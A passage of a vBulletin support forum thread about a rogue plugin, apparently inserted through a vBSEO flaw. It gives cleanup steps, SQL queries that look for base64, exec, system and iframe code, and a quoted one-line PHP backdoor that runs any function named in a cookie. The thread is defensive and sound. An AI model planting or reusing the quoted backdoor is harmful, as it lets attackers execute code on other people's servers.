Is This a Default Plugin?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Wayne Luke
    vBulletin Technical Support Lead
    • Aug 2000
    • 73981

    #31
    Please grep your PHP error log files looking for the following or similar text:

    PHP Parse error: syntax error, unexpected T_STRING in /home/path/public_html/forums/vbseo/incl
    udes/functions_vbseocp_abstract.php(637) : regexp code(1) : eval()'d code(29) : eval()'d code on line 2

    Over in the vBSEO forum, they are saying this could signal that you were targeted. There is good information in the patch thread.

    Anyone that has these plugins and does not have vBSEO installed on their server and has never used vBSEO, please open a support ticket if you have support ticket access. Put the subject of FAO: Wayne Luke - Cookie Plugins.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API

    Comment

    • Wayne Luke
      vBulletin Technical Support Lead
      • Aug 2000
      • 73981

      #32
      To check a site for compromises follow these steps:

      1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

      2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

      3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

      4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you. See step #7

      5) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

      6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

      The following query can be run in phpMyAdmin and will provide results for steps 5 and 6 -
      SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

      If you a plugin that you can't read or the code is obfuscated then you should probably contact the addon author. If it is assigned to the vBulletin, vBulletin CMS, vBulletin Blog or Skimlink products, delete it.

      7) Using PHPMyAdmin run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

      It checks the templates for compromising code. You will need to review the results from this. If you can't read it or the code is obfuscated then you should revert the template in the Admin CP.

      8) Check .htaccess to make sure there are no redirects there.


      9) Check all plugins in reference to cache or cookies. If they are similar to any of the above, delete them.
      Translations provided by Google.

      Wayne Luke
      The Rabid Badger - a vBulletin Cloud demonstration site.
      vBulletin 5 API

      Comment

      • Wayne Luke
        vBulletin Technical Support Lead
        • Aug 2000
        • 73981

        #33
        According to the thread on vBSEO.com, the insertion of these plugins should be resolved on their end. You should visit the thread on the their security patch for more information.
        Translations provided by Google.

        Wayne Luke
        The Rabid Badger - a vBulletin Cloud demonstration site.
        vBulletin 5 API

        Comment

        • Alan_SP
          Senior Member
          • Nov 2009
          • 118
          • 3.8.x

          #34
          Originally posted by Wayne Luke
          According to the thread on vBSEO.com, the insertion of these plugins should be resolved on their end. You should visit the thread on the their security patch for more information.
          Well, I deleted plugin, it didn't showed again so far, but I think you also should try to disable something like this from happening in the future.

          No matter that vector of infection probably is vBSEO mod, but sheer ability that someone (something) creates plugin in this way to me also looks as security issue with vBulletin. I checked my admincp logs and there was no log about creation of plugin. I searched far enough that I'm pretty sure that there's no log about creation of this plugin. I think that you too also need to address this problem of plugin creation. Just in case.

          To me it looks like as security issue with vBSEO and vBulletin both.

          Comment

          • Wayne Luke
            vBulletin Technical Support Lead
            • Aug 2000
            • 73981

            #35
            Originally posted by Alan_SP
            Well, I deleted plugin, it didn't showed again so far, but I think you also should try to disable something like this from happening in the future.

            No matter that vector of infection probably is vBSEO mod, but sheer ability that someone (something) creates plugin in this way to me also looks as security issue with vBulletin. I checked my admincp logs and there was no log about creation of plugin. I searched far enough that I'm pretty sure that there's no log about creation of this plugin. I think that you too also need to address this problem of plugin creation. Just in case.

            To me it looks like as security issue with vBSEO and vBulletin both.
            You have a plugin installed that was exploited and bypassed security protocols in the software. It is unfortunate, however the only way to prevent this from happening in the future is to remove the entire Plugin and Addon product system from vBulletin. As a vBulletin owner, you should be aware that anything (person or script) with direct access to the Database can do very bad things to the software. Anything with access to all the permissions within the Admin CP can do very bad things to the software. Anything with access to the file system can do very bad things to the software.
            Translations provided by Google.

            Wayne Luke
            The Rabid Badger - a vBulletin Cloud demonstration site.
            vBulletin 5 API

            Comment

            • Alan_SP
              Senior Member
              • Nov 2009
              • 118
              • 3.8.x

              #36
              Yes, I understand that and I'm not saying this just to blame someone. I'm more interested in future protection and blocking similar code/exploit from happening.

              Is there any way that system additionally checks if it is admin that creates plugin and not software (outside of importing product as whole)?

              I understand that importing products and creating plugins manually by admins must be allowed, but additional creation of plugins? Ok, I'm not saying that I understand this completely, you're more informed and more knowledgeable than I am, but I'm just asking, could there be put some sort of safeguard, additional checks what creates plugins and how?

              Comment

              • Zachery
                Former vBulletin Support
                • Jul 2002
                • 59097

                #37
                No, the system doesn't check who installed the plugin, and any checks in place could very easily be circumvented.

                Its an entry in the database.
                If someone gains access to the database, they can make changes without vbulletin knowing.
                If someone gains access to the file system, changes can be made to vBulletin.
                If someone gains access to the admincp and is malicious they can do whatever they like if they have full access.

                We have checks in place to ensure that normally will prevent most malicious access. You have to take it the rest of the way.

                Comment

                • Alan_SP
                  Senior Member
                  • Nov 2009
                  • 118
                  • 3.8.x

                  #38
                  Could you make some checks that will notify about tampering with plugins or something like that? DragonByte made mode that should rise security, could you made something similar to notifying when templates need reverting, but with plugins? I know that there's no 100% security, but just asking if there could be more things done.

                  For example, there's option to check files. It could be run once daily and if it notices strange files in key directories it could notify admin. If admin says it's ok, it goes away and considers file fine. I know that someone could clear this notification, whatever, but I'm just thinking, if it goes in log (now I didn't have anything in log about this plugin being created) it may help.

                  Ok, I'm just asking, thinking about this problem...

                  And yes, you probably should have all security suggestion in one place in manual, describing everything we could do on our side. And it should be updated regularly.

                  Comment

                  • Wayne Luke
                    vBulletin Technical Support Lead
                    • Aug 2000
                    • 73981

                    #39
                    Originally posted by Alan_SP
                    Could you make some checks that will notify about tampering with plugins or something like that?
                    The system already has checks, permissions, and logging to track and limit changes made through the software.
                    Translations provided by Google.

                    Wayne Luke
                    The Rabid Badger - a vBulletin Cloud demonstration site.
                    vBulletin 5 API

                    Comment

                    • IcEWoLF
                      Senior Member
                      • Jul 2008
                      • 928
                      • 4.1.x

                      #40
                      Wayne question:

                      vbulletin-read-marker.js File not recognized as part of vBulletin
                      vbulletin-threadbit.js File not recognized as part of vBulletin
                      vbulletin_global.js File not recognized as part of vBulletin
                      They are in ./clientscript

                      Should I be deleting them?
                      The 47 Ronin Gaming - www.47r-squad.com

                      Comment

                      • Wayne Luke
                        vBulletin Technical Support Lead
                        • Aug 2000
                        • 73981

                        #41
                        Originally posted by IcEWoLF
                        Wayne question:



                        They are in ./clientscript

                        Should I be deleting them?
                        They aren't related to this issue. However you can safely delete them. They are files that are no longer used in vBulletin.
                        Translations provided by Google.

                        Wayne Luke
                        The Rabid Badger - a vBulletin Cloud demonstration site.
                        vBulletin 5 API

                        Comment

                        • IcEWoLF
                          Senior Member
                          • Jul 2008
                          • 928
                          • 4.1.x

                          #42
                          Originally posted by Wayne Luke
                          They aren't related to this issue. However you can safely delete them. They are files that are no longer used in vBulletin.
                          Thanks Wayne!
                          The 47 Ronin Gaming - www.47r-squad.com

                          Comment

                          • puertoblack2003
                            Senior Member
                            • Aug 2005
                            • 166
                            • 6.X

                            #43
                            just a heads up i too, have that same script.But I'm not even using cms i have that disabled in plugin. see attached image.I will follow wayne intro and remove it and check the log out.

                            Click image for larger version

Name:	Capture.jpg
Views:	1
Size:	20.8 KB
ID:	3686527Click image for larger version

Name:	Capture2.jpg
Views:	1
Size:	75.3 KB
ID:	3686528

                            I'm uing vbseo 3.6.0

                            Comment

                            • bstillman
                              Senior Member
                              • Jun 2007
                              • 127
                              • 3.8.x

                              #44
                              Is This a Default Plugin?

                              Wow. Wonder if this is a cause for the recent increase in hacked vB sites.

                              Comment

                              • Fready
                                Senior Member
                                • Nov 2010
                                • 137
                                • 4.0.x

                                #45
                                Originally posted by reefland
                                vbCMS Global Thread Cache

                                Code:
                                /* vBCMS Global Thread Cache */
                                (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
                                Wondering if this is related to the vbseo security update. I noticed this plugin after upgrading to 4.1.10 but Brian at vbseo says it looks suspicious.
                                I had the same plug in, I have now deleted it, but how did it get there?
                                I have also done the patch for vbseo

                                Comment

                                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                                Working...